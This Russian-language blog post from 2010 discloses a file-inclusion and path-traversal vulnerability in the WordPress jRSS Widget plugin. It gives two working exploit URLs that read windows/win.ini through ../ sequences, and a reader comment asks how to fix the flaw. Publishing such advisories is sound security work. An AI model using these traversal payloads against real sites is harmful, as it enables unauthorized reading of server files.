PHP-инклюдинг в WordPress jRSS Widget Plugin

Написал
Ноябрь 11, 2010

Найдена уязвимость в плагине WordPress, который называется jRSS Widget Plugin 1.x эта уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Удаленный пользователь может получить содержимое произвольных файлов на целевой системе.

Эксплоит:

http://localhost/wordpress/wp-content/plugins/jrss-widget/proxy.php?url=../../../../../../../../windows/win.ini

http://localhost/wordpress/wp-content/plugins/seo-automatic-seo-tools/feedcommander/get_download.php?file=../../../../../../../../windows/win.ini

Popularity: 24% [?]

Плагины, Уязвимости

Если вам понравился пост, вы можете оставить комментарий или подписаться на RSS и получать каждый новый пост из этого блога.

Комментарии
Комментарий by Андрей Кочуров Ноябрь 13, 2010 @ 2:29 пп

Как исправить эту уязвимость, и что такое «эксплоит» – возможность вызова уязвимости, исправление её или что-либо другое? Не все же программеры…

Оставьте комментарий

(обязательно)

(обязательно)